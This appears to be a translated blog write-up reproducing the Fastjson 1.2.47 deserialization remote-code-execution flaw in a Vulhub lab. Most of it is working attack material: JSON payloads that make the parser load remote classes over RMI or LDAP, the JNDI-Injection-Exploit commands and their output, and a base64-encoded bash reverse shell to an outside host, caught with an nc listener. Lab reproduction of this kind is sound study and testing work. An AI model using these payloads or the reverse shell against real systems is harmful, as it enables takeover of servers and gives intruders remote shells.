Thanks to the Internet for sharing knowledge and wisdom. In a society ruled by law, please abide by relevant laws and regulations
Article directory
-
-
- 1.1. Vulnerability description
- 1.2. Vulnerability level
- 1.3. Affected versions
- 1.4. Vulnerability recurrence
-
- 1. Basic environment
- 2. Vulnerability detection
- 3. Vulnerability verification
- 1.5. In-depth utilization
-
- 1. Rebound Shell
-
| Description | Content |
|---|---|
| Vulnerability number | |
| Vulnerability name | Fastjson_1.2.47_Remote execution vulnerability |
| Vulnerability rating | |
| Scope of impact | |
| Vulnerability description | |
| Repair plan |
1.1. Vulnerability description
Fastjson is an open source json parser developed by Alibaba. It has excellent performance and is widely used in Java projects of major manufacturers. Fastjson added a deserialization whitelist after version 1.2.24. In versions before 1.2.48, attackers can use specially constructed json strings to bypass whitelist detection and successfully execute arbitrary commands.
1.2, vulnerability level
high risk
1.3, affected version
1.2.47
1.4. Vulnerability recurrence
1. Basic environment
Path: Vulhub/fastjson/1.2.47-rce
Start the test environment:
sudo docker-compose up -d
Visit http://your-ip:8090/ to see a json object returned
After changing the content-type to application/json, you can POST a new JSON object to it, and the backend will use fastjson for parsing.
Send test data:
{<!-- -->"name":"hello", "age":20}
2. Vulnerability detection
Use BurpSuite extension plug-in FastjsonScan for vulnerability detection
POC:
{<!-- -->
"axin":{<!-- -->
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"is":{<!-- -->
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://s0tgwxk05ll1qvmz0lwr27u0prvhj6.oastify.com/aaa",
"autoCommit":true
}
}
Test using dnslog
3. Vulnerability verification
Use the JNDI-Injection-Exploit tool to open the RMI server
Create the hello file in the /tmp directory
┌──(kali?kali)-[~/tools/JNDI-Injection-Exploit/target] └─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/demo" -A "192.168.80.141" [ADDRESS] >> 192.168.80.141 [COMMAND] >> touch /tmp/demo ----------------------------JNDI Links-------------------------- -------- Target environment(Build in JDK 1.7 whose trustURLCodebase is true): rmi://192.168.80.141:1099/fuk3fq ldap://192.168.80.141:1389/fuk3fq Target environment(Build in JDK 1.8 whose trustURLCodebase is true): rmi://192.168.80.141:1099/slgipa ldap://192.168.80.141:1389/slgipa Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 + or SpringBoot 1.2.x + in classpath): rmi://192.168.80.141:1099/zsjp7n ----------------------------Server Log-------------------- -------- 2023-09-08 03:53:56 [JETTYSERVER]>> Listening on 0.0.0.0:8180 2023-09-08 03:53:56 [RMISERVER] >> Listening on 0.0.0.0:1099 2023-09-08 03:53:57 [LDAPSERVER] >> Listening on 0.0.0.0:1389
Send POC to FastJson server and remotely load malicious classes through RMI protocol
{<!-- -->
"axin":{<!-- -->
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"is":{<!-- -->
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.80.141:1099/slgipa",
"autoCommit":true
}
}
Enter the docker container to verify:
1.5, in-depth utilization
1. Rebound Shell
Construct a rebound shell and perform base64 encoding
bash -i > & amp; /dev/tcp/192.168.80.141/1234 0> & amp;1
bash -c {<!-- -->echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash,-i }
Listen to 1234 port
nc -lvp 1234
Enable RMI service
┌──(kali?kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA + JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {<!-- -->echo,YmFzaCAtaSA + JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash, -i}
----------------------------JNDI Links-------------------------- --------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fd5cfs
ldap://192.168.80.141:1389/fd5cfs
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/flbdik
ldap://192.168.80.141:1389/flbdik
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 + or SpringBoot 1.2.x + in classpath):
rmi://192.168.80.141:1099/m8yxp6
----------------------------Server Log-------------------- --------
2023-09-08 04:02:36 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 04:02:36 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-09-08 04:02:36 [LDAPSERVER] >> Listening on 0.0.0.0:1389
POC:
{<!-- -->
"axin":{<!-- -->
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"is":{<!-- -->
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.80.141:1389/fd5cfs",
"autoCommit":true
}
}
Get Shell
